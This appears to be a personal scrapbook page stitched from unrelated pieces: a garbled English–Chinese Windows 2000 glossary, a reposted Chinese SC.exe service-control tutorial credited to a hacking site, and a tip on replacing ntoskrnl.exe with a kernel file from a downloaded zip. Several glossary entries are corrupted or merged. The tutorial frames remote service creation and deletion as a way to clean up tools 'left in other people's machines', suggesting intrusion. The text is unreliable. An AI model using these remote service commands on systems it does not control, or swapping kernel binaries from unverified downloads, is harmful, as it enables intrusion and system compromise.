root / 根

root authority / 根颁发机构

root certificate / 根证书

root hints / 根提示

root servers / 根服务器

round robin / 循环提示器

Routemon utility / Routemon 实用程序

router / 路由器

routing / 路由

Routing Information Protocol over IPX, RIPX / 在 IPX 上的路由信息协议

routing link / 路由链接

routing-link cost / 路由链接成本

routing protocol / 路由协议旘

routing services / 路由服务

RPC, remote procedure call / 远程过程调用

RR, resource record / 资源记录

Rrset, resource record set / 资源记录集

RS-232-C standard / RS-232-C 标准

RSA 一个认证安全机构

RSL, registry size limit / 注册表大小限制

RSVP, Resource Reservation Protocol / 资源保留协议

RTP, Rea / ime Transport Protocol / 实时传输协议

S
S/MIME, Secure Multipurpose Internet Mail Extensions / 安全多用途网际邮件扩展协议

SACL, system access control list / 系统访问控制列表

safe mode / 安全模式

safe mode with command prompt / 命令提示符下的安全模式

safe mode with networking / 联网安全模式

SAM, security account manager / 安全帐户管理器

SAM account name / SAM 帐户名

saturation / 饱和度

SBM, subnet bandwidth management / 子网带宽管理

scalability / 可伸缩性

scavenging / 清理

schema / 架构

schema master / 架构主机

scope / 作用域

scope of influence / 影响的作用域

screen fonts / 屏幕字体

screen resolution / 屏幕分辨率

screen saver / 屏幕保护程序

SCSI, small computer system interface / 小型计算机系统接口

SDP, Standard Description Protocol / 标准描述协议

second-level domains / 二级域

secondary master / 辅助主机

secret key encryption / 密钥加密

sector / 扇区

Secure Hash Algorithm, SHA-1 / 安全散列算法

Secure Multipurpose Internet Mail Extensions, S/MIME / 安全多用途网际邮件扩展协议

Secure Sockets Layer, SSL / 安全套接字层

security / 安全性

security account manager,SAM / 安全帐户管理器

security descriptor / 安全描述

security group / 安全组

security host / 安全主机

security ID,SID / 安全 ID

security identifier / 安全标识符

security log / 安全日志

security principal / 安全主体

security principal name / 安全主体名称

See Files / 查看文件

See Folders / 查看文件夹

seed router / 种子路由器

Serial Line Internet Protocol, SLIP / 串行线路网际协议

serial port / 串行端口

server / 服务器

server application / 服务器应用程序

server cluster / 服务器群集

server zone / 服务器区域

service / 服务

Service Profile Identifier, SPID / 服务配置文件标识符

service (SRV) resource record / 服务 (SRV) 资源记录

service ticket / 服务票据

service-centric / 服务屏幕字体Services for Macintosh (now called AppleTalk network integration) / Macintosh 服务(现在称为 AppleTalk 网络集成)

session / 会话

session concentration / 会话集中度

set-by-caller callback / 由呼叫者设置的回叫

SHA-1, Secure Hash Algorithm / 安全散列算法

share / 共享

shared folder / 共享文件夹

shared folder permissions / 共享文件夹权限

shared network directory / 共享网络目录

shared printer / 共享打印机

shared resource / 共享资源

short name / 短名称

shortcut / 快捷方式

SID, security ID / 安全 ID

signaling protocol / 信号协议

signature PKI / 签名 PKI

Simple Mail Transfer Protocol, SMTP / 简单邮件传输协议

Simple Network Management Protocol, SNMP / 简单网络管理协议

Simple TCP/IP Services / 简单 TCP/IP 服务

simple volume / 简单卷

Single Instance Store, SIS / 零备份存储

single sign-on / 单一登录

SIS, Single Instance Store / 零备份存储

site / 站点

Site Se4 6 b d a; y; 站点服务器 ILS 服务

SLIP, Serial Line Internet Protocol / 串行线路网际协议

small computer system interface, SCSI / 小型计算机系统接口

smart card / 智能卡

smart card reader / 智能卡读取器

SMTP, Simple Mail Transfer Protocol / 简单邮件传输协议

snap-in / 管理单元

SNMP, Simple Network Management Protocol / 简单网络管理协议

SOA (start-of-authority) resource record / SOA(颁发机构开始)资源记录

software decoder / 软件解码器

source Document / 源文档

source journaling / 源日志

spanned volume / 跨区卷

sparse file / 稀疏文件

special access permissions / 特殊访问权限

SPID, Service Profile Identifier / 服务配置文件标识符

split horizon / 水平拆分

splitting / 拆分

spooler / 后台打印程序

spooling / 后台打印

SRV (service) resource record / SRV(服务)资源记录

SSL, Secure Sockets Layer / 安全套接字层

stand-alone server / 独立服务器

Standard Description Protocol, SDP / 标准描述协议

start-of-authority (SOA) resource record / 颁发机构开始 (SOA) 资源记录

startup environment / 启动环境

static dialog box / 静态对话框

static load balancing / 静态负载平衡

static routes / 静态路由

status area / 状态区域

status bar / 状态栏

STOP error / STOP 错误

storage-class resource / 存储类资源

strict RFC checking / 严格的 RFC 检查

string / 字符串

stripe set / 带区集

stripe set with parity / 带有奇偶校验的带区集

striped volume / 带区卷

subdomain / 子域

subkey / 子项

subnet bandwidth management, SBM / 子网带宽管理

subtree / 子树

superscope / 超级作用域

SVC, switched virtual circuit / 交换虚电路

swap file / 交换文件

switch type / 交换类型

switched circuit / 交换电路

switched virtual circuit, SVC / 交换虚电路

switching hub / 交换集线器

symmetric encryption / 对称加密

system access control list, SACL / 系统访问控制列表

system default profile d driver /

system disk / 系统盘

system files / 系统文件

System menu / 系统菜单

system partition / 系统分区

system policy / 系统策略

system queue / 系统队列

System State / 系统状态

system variables / 系统变量

system volume / 系统卷

systemroot / 系统根

Systems Management Server / 系统管桨服务器

SYSVOL

T
T.120

tag / 标记

TAPI, Telephony API / 电话 API

target journaling / 目标日志

taskbar / 任务栏

taskbar button / 任务栏按钮

TCP/IP, Transmission Control Protocol/Internet Protocol / 传输控制协议/网际协议

Telephony API, TAPI / 电话 API

telephony switch / 电话交换

Terminal Services / 终端服务

Terminal Services Licensing / 终端服务授权

terminate-and-stay-resident (TSR) program / 终止并驻留内存 (TSR) 程序

test queue / 测试队列

text box / 文本框

TFTP, Trivial File Transfer Protocol / 简单文件传输协议

TGS, ticket-granting service / 票据授予服务

TGT, ticket-granting ticket / 票据授予票据

Thread Count / 线程数

thumbnail / 缩略图

ticket / 票据

ticket-granting service, TGS / 票据授予服务

ticket-granting ticket, TGT / 票据授予票据

time slice / 时间片

time stamp / 时间戳

time-out error / 超时错误

Time-To-Live, TTL / 活动时间

title bar / 标题鯅

TLS, Transport Layer Security / 传输层安全

top-level domains / 顶级域

topological database / 拓扑数据库

topology / 拓扑

touch-tone dialing / 按键式拨号

trace log / 追踪日志

transaction / 事务处理

transaction dead-letter queue / 事务处理死信队列

transactional message / 事务处理消息

transitive trust / 可传递信任

Transmission Control Protocol/Internet Protocol, TCP/IP / 传输控制协议/网际协议

transmitting station ID (TSID) string / 传输站 ID (TSID) 字符串

Transport Layer Security, TLS / 传输层安全

trap / 陷阱

tree view / 树视图

triggered update / 触发更新

Trivial File Transfer Protocol, TFTP / 简单文件传输协议

Trojan horse / 特洛伊木马

TrueType fonts / TrueType 字体

trust relationship / 信任关系

TSID (transmitting station ID) string / 传输站 ID 字符串

TSR (terminate-and-stay-resident) program / 终止并驻留内存程序

TTL, Time-To-Live / 生存时间

tunnel / 隧道

tunnel server / 隧道服务器

two-way trust / 双向信任

Type 1 fonts / Type 1 字体

U
UAM, user authentication module / 用户身份验证模块

UBR, unspecified bit rate / 未指定的传输率

UCS, Unicode Character System / Unicode 字符系统

UDP, User Datagram Protocol / 用户数据报协议

unallocatelimit / / 未分配的空间

UNC (Universal Naming Convention) name / 通用命名规则名称

UNI, user network interface / 用户网络接口

unicast / 单播

Unicode

Unicode Character System, UCS / Unicode 字符系统

Unicode Transmission format 8, UTF-8 / Unicode 传输格式 8

uninstall / 卸载

universal group / 通用组

Universal Naming Convention (UNC) name / 通用命名规则名称

universal serial bus, USB / 通用串行总线

unspecified bit rate, UBR / 未指定的传输率

upcasing / 大写转换

upgrade / 升级

UPS, uninterruptible power supply / 不间断电源

UPS service / UPS 服务

USB, universal serial bus / 通用串行总线

user account / 用户帐户

user authentication module, UAM / 用户身份验证模块

user class / 用户类

User Datagram Protocol, UDP / 用户数据报协议

user name / 用户名

user network interface, UNI / 用户网络接口

USER object / USER 对象

user password / 用户密码

user principal name / 用户主体名称

user principal name suffix / 用户主体名称后缀

user profile / 用户配置文件

user rights / 用户权限

user rights policy / 用户权限策略

Users / 用户

UTF-8, Unicode Transmission format 8 / Unicode 传输格式 8

V
V.34

V.90

validation / 验证

value entry / 值项

variable / 变量

variable bit rate, VBR / 可变传输率

VBR, variable bit rate / 可变传输率

VCI, virtual channel identifier / 虚拟信道标识符

VDM, virtual DOS machine / 虚拟 DOS 机

vector / 矢量

vector fonts / 矢量字体

vendor class / 供应商类别

video codec / 视频解码

virtual channel identifier, VCI / 虚拟信道标识符

virtual container / 虚拟容器

virtual DOS machine / 虚拟 DOS 机器(VDM)

virtual IP address / 虚拟 IP 地址

virtual link / 虚拟链接

virtual local area network, VLAN / 虚拟局域网

virtual memory / 虚拟内存

Virtual Memory Size / 虚拟内存大菆

virtual network / 虚拟网络

virtual path identifier, VPI / 虚拟路径标识符

virtual printer memory / 虚拟打印机内存

virtual private network, VPN / 虚拟专用网络

virtual server / 虚拟服务器

virus / 病毒

VLAN, virtual local area network / 虚拟局域网

VoIP, Voice over Internet Protocol / 通过 IP 协议的语音

volume / 卷

volume password / 卷密码

volume set / 卷集

voluntary tunnel / 自主隧道

VPI, virtual path identifier / 虚拟路径标识符

virtual private network, VPN / 虚拟专用网络

W
Waiting for Call / 等待呼叫

wallpaper / 墙纸

WAN, wide area network / 广域网

warning level ss server / folder / Web 文件夹

Web server / Web 服务器

well-connected / 连接良好

well-known services / 公认的服务

wide area network, WAN / 广域网

wildcard character / 通配符

wildcarding / 通配符方式

window menu / 窗口菜单

Windows 2000 Server File and Print Servers for Macintosh / Windows 2000 Server 的 Macintosh 文件与打印服务器

Windows 2000 Task Manager / Windows 2000 任务管理器

Windows Internet Name Service, WINS / Windows Internet 命名服务

Windows Management Instrumentation, WMI / Windows 管理规范

Windows Media Services / Windows Media 服务

WINS, Windows Internet Name Service / Windows Internet 命名服务

WINS proxy / WINS 代理

WINS resource / WINS 资源

Winsock

wireless communication / 无线通讯

WMI, Windows Management Instrumentation / Windows 管理规范

workgroup / 工作组

X
X.500

X.509v3 certificate / X.509/ 证书

XOR, exclusive OR / 异或

Y
无词汇表项

Z

zone / 区域

zone list / 区域列表

zone transfer / 区域传送


            

 

 

http://5522.cn/hack/cjhk/jczs/200407/136.html

写这个东西的目的在于让大家了解一下SC这个服务管理程序的使用,另一方面也是为了让大家更进一步的了解到NT,2000的服务的一些基础问题,如果有时间,希望大家好好看看。再来结合起上一次如何打开termservice服务的那篇文章,在服务方面大家应该比较了解了。用这个东西就可以删除在别人机器里留下的如ffsniffer, sksockerver这些东西,不用再担心,装上了删除不了。但是毕竟这个东西还是MS的产品,所以,如eventlog这样的服务,是不可以用它关闭的。累呀累呀,写了我整整一个早上,就是不知道有没有人看!

我们知道在MStools SDK,也就是在Resource Kit有一个很少有人知道的命令行软件,SC.exe,这个软件向所有的

Windows NT和Windows 2000要求控制他们的API函数。我们可以在命令行里通过对这些函数设定参数的方式来设定

他们(API)。SC.exe也可以显示服务的状态,同时也可以从状态结构区域里重新找到存储在里面的数值。它还可以

列出远程计算机的服务函数或者是服务状况结构。
SC.exe这个开发工具至少可以比服务控制面板程序和网络命令行界面(net.exe,这个东西可以告诉你一个服务是

在运行中,还是停止,还是暂停。)这两个东西提供更多的细节和准确的信息。虽然上述两个东西在正常工作的

情况下,对于完整的调试是非常好用的,但是如果有新的服务,或者新的代码被开发出来的时候,这两个工具提

供的信息可能造成误导。这也就是我们需要用到SC的原因。
下面举列说明,如果在开发阶段,你的服务在挂住在一个start-pending的时候,控制面板和net.exe同样报告服

务是在运行的。但它挂在一个stop-pending的时候,net.exe报告它运行,而控制面板着报告它停止,如果你试着

启动它,这是控制面板则会告诉你这个服务正在运行。难道这不是很困惑吗?呵呵!
SC.exe可以让你询问服务的状况和取出存储在状态结构区域内的数值,控制面板和net.exe不提供服务完整的状况

。但是无论如何,SC程序可以告诉你这个服务准确的情形,同样也可以给你看最后的checkpoint数和等待提示。

这个checkpoint,我叫它检查点(我觉得他就像一个程序调试时置的断点),所以我们也可以把看作为一个调试工

具,因为它可以提供一个关于在程序停止时还要沿着初始化继续前进多久准确报告。
SC.exe也可以允许你调用很多的服务控制API函数,可以让你从命令行里改变大量的参数。这位服务开发者们提供

了很多的优势。例如,它提供了一个方便的方式来创建或者在注册表和服务控制管理数据库中配置服务信息。开

发者们不需要在手动的在注册表里单独的设置键值来配置服务,也不用重起机器来强迫服务控制管理数据库升级


作为一个命令很工具,SC.exe可以用来测试你自己的系统,你可以设置一个批处理文件来使用不同的参数调用

SC.exe来控制服务。这个很有用,如果你想看看你的服务不断的启动和停止,我没有试过哦!让一个服务一下子

打开,一下子关闭,听上去很不错的。如果你的服务进程里面有多个进程的话,你可以保持一个进程继续运行不

让它走开,然后让另一个不断的打开在关闭,还可以寻找一下内存缺乏导致不完全清楚的证据。
下面介绍SC,SC QC,and SC QUERY

SC使用这样的语法:
1. SC [Servername] command Servicename [Optionname= Optionvalues]

2. SC [command]

这里使用第一种语法使用SC,使用第二种语法显示帮助。

下面介绍各种参数。

Servername
可选择:可以使用双斜线,如\\myserver,也可以是\\192.168.0.1来操作远程计算机。如果在本地计算机上操作

就不用添加任何参数。

Command
下面列出SC可以使用的命令。

config—-改变一个服务的配置。(长久的)

continue–对一个服务送出一个继续控制的要求。

control—-对一个服务送出一个控制。

create—-创建一个服务。(增加到注册表中)

delete—-删除一个服务。(从注册表中删除)

EnumDepend–列举服务的从属关系。

GetDisplayName–获得一个服务的显示名称。

GetKeyName–获得一个服务的服务键名。

interrogate–对一个服务送出一个询问控制要求。

pause—-对一个服务送出一个暂停控制要求。

qc—-询问一个服务的配置。

query—-询问一个服务的状态,也可以列举服务的状态类型。

start—-启动一个服务。

stop—-对一个服务送出一个停止的要求。

Servicename
在注册表中为service key制定的名称。注意这个名称是不同于显示名称的(这个名称可以用net start和服务控

制面板看到),而SC是使用服务键名来鉴别服务的。

Optionname
这个optionname和optionvalues参数允许你指定操作命令参数的名称和数值。注意,这一点很重要在操作名称和等

号之间是没有空格的。一开始我不知道,结果………………,比如,start= optionvalues,这个很重要。

optionvalues可以是0,1,或者是更多的操作参数名称和数值对。
如果你想要看每个命令的可以用的optionvalues,你可以使用sc command这样的格式。这会为你提供详细的帮助。

Optionvalues
为optionname的参数的名称指定它的数值。有效数值范围常常限制于哪一个参数的optionname。如果要列表请用

sc command来询问每个命令。

Comments
很多的命令需要管理员权限,所以我想说,在你操作这些东西的时候最好是管理员。呵呵!

当你键入SC而不带任何参数时,SC.exe会显示帮助信息和可用的命令。当你键入SC紧跟着命令名称时,你可以得

到一个有关这个命令的详细列表。比如,键入sc create可以得到和create有关的列表。
但是除了一个命令,sc query,这会导出该系统中当前正在运行的所有服务和驱动程序的状态。

当你使用start命令时,你可以传递一些参数(arguments)给服务的主函数,但是不是给服务进程的主函数。

SC create
这个命令可以在注册表和服务控制管理数据库建立一个入口。

语法1
sc [servername] create Servicename [Optionname= Optionvalues]

这里的servername,servicename,optionname,optionvalues和上面的一样,这里就不多说了。这里我们详细说

明一下optionname和optionvalues。

Optionname–Optionvalues
描述

type=—-own, share, interact, kernel, filesys
关于建立服务的类型,选项值包括驱动程序使用的类型,默认是share。

start=—-boot, sys tem, auto, demand, disabled
关于启动服务的类型,选项值包括驱动程序使用的类型,默认是demand(手动)。

error=—-normal, severe, critical, ignore
当服务在导入失败错误的严重性,默认是normal。

binPath=–(string)
服务二进制文件的路径名,这里没有默认值,这个字符串是必须设置的。

group=—-(string)
这个服务属于的组,这个组的列表保存在注册表中的ServiceGroupOrder下。默认是nothing。

tag=—-(string)
如果这个字符串被设置为yes,sc可以从CreateService call中得到一个tagId。然而,SC并不显示这个标签,所

以使用这个没有多少意义。默认是nothing

depend=—-(space separated string)有空格的字符串。
在这个服务启动前必须启动的服务的名称或者是组。

obj=—-(string)
账号运行使用的名称,也可以说是登陆身份。默认是localsys tem

Displayname=–(string)
一个为在用户界面程序中鉴别各个服务使用的字符串。

password=–(string)
一个密码,如果一个不同于localsys tem的账号使用时需要使用这个。

Optionvalues
Optionname参数名称的数值列表。参考optionname。当我们输入一个字符串时,如果输入一个空的引用这意味着

一个空的字符串将被导入。

Comments
The SC CREATE command performs the operations of the CreateService API function.
这个sc create命令执行CreateService API函数的操作。详细请见CreateService。

例1
下面这个例子在一台叫做(\\myserver)的计算机上为一个叫“NewService”的服务建立的一个注册表登记。
sc \\myserver create NewService binpath= c:\winnt\sys tem32\NewServ.exe

按照默认,这个服务会建立一个WIN32_SHARE_PROCESS使用SERVICE_DEMAND_START启动方式。这将不会有任何从属

关系,也将会按照localsys tem安全上下关系来运行。

例2
下面这个例子将在本地计算机上,建立一个服务,它将会是一个自动运行服务,并且运行在他自己的进程上。它

从属于TDI组和NetBios服务上。注意,你必须在从属中间增加一个空格的引用。

sc create NewService binpath= c:\winnt\sys tem32\NewServ.exe type= own
start= auto depend= “+TDI Netbios”

例3
服务开发者可以通过临时改变二进制路径(影像路径)的方式来将这个服务运行在内核调试器的上下关系中。下

面这个例子就可以让我们看到如何改变服务的配置。

sc config NewService binpath= “ntsd -d c:\winnt\sys tem32\Newserv.exe”
这个例子会引起服务控制管理器调用ntsd.exe使用下例的参数字符串:
“-d c:\nt\sys tem32\NewServ.exe”

当系统装入newserv.exe时ntsd将会转而打断调试器,所以断点可以被设置在服务代码里。

SC QC
这个SC QC“询问配置”命令可以列出一个服务的配置信息和QUERY_SERVICE_CONFIG结构。

语法1
sc [Servername] qc Servicename [Buffersize]

Parameters
servername和servicename前面已经介绍过了,这里不再多说。

Buffersize,可选择的,列出缓冲区的尺寸。

Comments

SC QC命令显示了QUERY_SERVICE_CONFIG结构的内容。

以下是QUERY_SERVICE_CONFIG相应的区域。
TYPE——dwServiceType
START_TYPE—-dwStartType
ERROR_CONTROL—-dwErrorControl
BINARY_PATH_NAME–lpBinaryPathName
LOAD_ORDER_GROUP–lpLoadOrderGroup
TAG——dwTagId
DISPLAY_NAME—-lpDisplayName
DEPENDENCIES—-lpDependencies
SERVICE_START_NAME–lpServiceStartName

例1

下面这个例子询问了在上面例子中建立的“NewService”服务的配置:

sc \\myserver qc NewService

sc显示下面的信息:

SERVICE_NAME: NewService
TYPE : 20 WIN32_SHARE_PROCESS
START_TYPE : 3 DEMAND_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : c:\winnt\sys tem32\NewServ.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : NewService
DEPENDENCIES :
SERVICE_START_NAME : Localsys tem

NewService有能力和其他的服务共享一个进程。但是它不是自动启动的。二进制文件名是NewServ.exe。这个服务

不依靠与其它的的服务,而且运行在lcoalsys tem的安全上下关系中。这些都是调用QueryServiceStatus基本的返

回,如果还需要更多的细节届时,可以看看API函数文件。

SC QUERY

SC QUERY命令可以获得服务的信息。

语法:
sc [Servername] query { Servicename │ Optionname= Optionvalues… }

参数:

servername, servicename, optionname, optionvalues不在解释。只谈一下这个命令提供的数值。

Optionname–Optionvalues
Description

type=—-driver, service, all
列举服务的类型,默认是service

state=—-active, inactive, all
列举服务的状态,默认是active

bufsize=–(numeric values)
列举缓冲区的尺寸,默认是1024 bytes

ri=—-(numeric values)
但开始列举时,恢复指针的数字,默认是0

Optionvalues
同上。

Comments

SC QUERY命令可以显示SERVICE_STATUS结构的内容。

下面是SERVICE_STATUS结构相应的信息:
TYPE——dwServiceType
STATE——dwCurrentState, dwControlsAccepted
WIN32_EXIT_CODE—-dwWin32ExitCode
SERVICE_EXIT_CODE–dwServiceSpecificExitCode
CHECKPOINT—-dwCheckPoint
WAIT_HINT—-dwWaitHint

在启动计算机后,使用SC QUERY命令会告诉你是否,或者不是一个启动服务的尝试。如果这个服务成功启动,WIN32_EXIT_CODE区间会将会包含一个0,当尝试不成功时,当它意识到这个服务不能够启动时,这个区间也会提供一个退出码给服务。

例子

查询“NewService”服务状态,键入:

sc query NewService

显示一下信息:

SERVICE_NAME: NewService
TYPE : 20 WIN32_SHARE_PROCESS
STATE : 1 STOPPED
(NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 1077 (0×435)
SERVICE_EXIT_CODE : 0 (0×0)
CHECKPOINT : 0×0
WAIT_HINT : 0×0

注意,这里存在一个给这个服务的退出码,即使这个服务部不在运行,键入net helpmsg 1077,将会得到对1077错误信息的说明:

上次启动之后,仍未尝试引导服务。

所以,这里我想说一句,希望大家可以活用net helpmsg,这会对你的学习有很大的帮助。

下面在对SC query的命令在说明一下:

列举活动服务和驱动程序状态,使用以下命令:
sc query

显示messenger服务,使用以下命令:
sc query messenger

只列举活动的驱动程序,使用以下命令:
sc query type= driver

列举Win32服务,使用以下命令:
sc query type= service

列举所有的服务和驱动程序,使用以下命令:
sc query state= all

用50 byte的缓冲区来进行列举,使用以下命令:
sc query bufsize= 50

在恢复列举时使用index=14,使用以下命令:
sc query ri=14

列举所有的交互式服务,使用以下命令:
sc query type= service type= interact

相关软件srvinstw.exe

08/04运行

http://article.pchome.net/2003/08/13/11711.htm

.

D:\Documents and Settings\用户名

..

D:\Documents and Settings\(上一级)

我的电脑

\

D:\(猜测系统盘)

 

Windows\System32

快捷方式

08/06

http://www.pcgames.com.cn/cartoon/origin/pic/0311/241726.html

Boot Screens

If you have multiple logon screens that you would like to select between, please look at this app. Looks like a very nice utility.

Backup (copy) the file %windir%\system32\ntoskrnl.exe (most likely C:\windows\system32\ntoskrnl.exe – the boot screen)

Download the .zip to your computer

Extract ntoskrnl.exe to a directory other than %windir%\system32 (most likely C:\windows\system32)

Reboot your computer into Safe Mode (hit F8 before the boot screen) or into true DOS (from a boot disk)

Overwrite the file %windir%\system32\ntoskrnl.exe (which should have been backed up) with the extracted exe

Reboot your computer as you normally would

hoho原来如此,改天去先锋遛遛

http://www.alizee-fanpage.com/page.php?language=ger&content=styles